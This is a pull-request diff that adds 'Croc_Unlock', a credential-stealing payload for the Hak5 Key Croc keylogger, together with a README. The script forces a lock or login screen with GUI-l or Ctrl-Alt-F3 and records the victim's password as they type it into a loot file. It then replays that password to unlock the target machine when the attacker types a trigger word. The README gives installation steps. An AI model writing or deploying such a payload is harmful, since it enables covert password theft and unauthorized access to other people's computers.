Merge pull request #54 from spywill/patch-4

Patch 4

payloads/library/credentials/Croc_Unlock/Croc_Unlock.txt

@@ -0,0 +1,95 @@
+# Title:           Croc_Unlock
+# Description:     Save target passwd with SAVEKEYS command by pressing GUI-l or CONTROL-ALT-F3
+#                  Log in with typing crocunlock, save at /loot/Croc_Pot/Croc_unlock.txt.filtered and /tools/Croc_Pot/Croc_unlock.txt.filtered
+# Author:          Spywill
+# Version:         2.2
+# Category:        Key Croc
+# Props:           RootJunky
+
+MATCH (crocunlock|GUI-l|CONTROL-ALT-F3)
+
+UNLOCK_TMP="/tmp/unlock_Count.txt"
+
+CROC_POT_DIR=(/root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot)
+for dir in "${CROC_POT_DIR[@]}"; do [[ ! -d "$dir" ]] && mkdir "$dir" || LED B; done
+
+UNLOCK_FILE() {
+	until [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; do
+		:
+	done
+	sed -i '/\b'$(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)'\b/!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered
+	LED G
+	Q DELAY 1000
+	LED OFF
+}
+
+UNLOCK_COUNT() {
+	if [ -f $UNLOCK_TMP ]; then
+		i=$(sed -n 1p $UNLOCK_TMP)
+		echo "$(( $i + 1 ))" > $UNLOCK_TMP
+	else
+		echo "$(( i++ ))" > $UNLOCK_TMP
+		if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
+			sed -i '/\b'$(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)'\b/!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered
+			cat /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered >> /root/udisk/loot/Croc_Pot/Croc_unlock.txt.filtered
+			rm -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered /root/udisk/tools/Croc_Pot/Croc_unlock.txt
+		fi
+	fi
+	Q DELAY 1000
+}
+
+RELOAD() {
+	killall -9 bash
+	killall -9 python
+	sleep 1
+	RELOAD_PAYLOADS
+}
+
+case $LOOT in
+	"GUI-l" | "CONTROL-ALT-F3")
+		UNLOCK_COUNT
+		if [ "$(sed -n 1p $UNLOCK_TMP)" -gt "0" ]; then
+			UNLOCK_FILE
+			RELOAD
+		elif [ "$(sed -n 1p $UNLOCK_TMP)" -eq "0" ]; then
+			if [ "$LOOT" = "CONTROL-ALT-F3" ]; then
+				if [ -f /root/udisk/tools/Croc_Pot/Croc_OS.txt ]; then
+					if [ "$(sed -n 3p /root/udisk/tools/Croc_Pot/Croc_OS.txt)" = "raspberrypi" ]; then
+						Q STRING "$(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt)"
+						Q ENTER
+						Q DELAY 1000
+					fi
+				fi
+			elif [ "$LOOT" = "GUI-l" ]; then
+				Q BACKSPACE
+			fi
+SAVEKEYS /root/udisk/tools/Croc_Pot/Croc_unlock.txt UNTIL ENTER
+			LED ATTACK
+			UNLOCK_FILE
+		fi
+;;
+	crocunlock)
+		if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
+			UNLOCK_FILE
+			LED SETUP
+			Q BACKSPACE
+			Q BACKSPACE
+			Q BACKSPACE
+			Q BACKSPACE
+			Q BACKSPACE
+			Q BACKSPACE
+			Q BACKSPACE
+			Q BACKSPACE
+			Q BACKSPACE
+			Q BACKSPACE
+			Q DELAY 1000
+			Q STRING "$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)"
+			Q ENTER
+			LED OFF
+			RELOAD
+		else
+			LED R
+			RELOAD
+		fi
+;;
+esac

payloads/library/credentials/Croc_Unlock/README.md

@@ -0,0 +1,19 @@
+# Croc_Unlock
+## INTRODUCTION :
+* This project is developed for the HAK5 KeyCroc
+  - Pressing **GUI-l** will open windows / linux parrot OS login screen and wait for user to enter passwd with SAVEKEYS command
+  - Pressing **CONTROL-ALT-F3** will open Raspberry pi 4 terminal login screen and wait for user to enter passwd with SAVEKEYS command
+  - Type in **crocunlock** at the target login screen will delete crocunlock characters and enter user passwd
+  - Payload will save passwd at /tools/Croc_Pot/Croc_unlock.txt.filtered, this payload was design to help with Croc_Pot
+  - Old passwd will be save at /loot/Croc_Pot/Croc_unlock.txt.filtered
+
+  - **NOTE:** This payload is relying on the ENTER key to be press after user has enter passwd
+
+* **TESTED ON**
+  -  Windows 10
+  -  Raspberry pi 4
+  -  linux parrot OS
+ 
+ ## INSTALLATION :
+   - Will need to enter arming mode on your keycroc to install file.
+   - File is called **CrocUnlock.txt** Place this in the KeyCroc **payload folder**.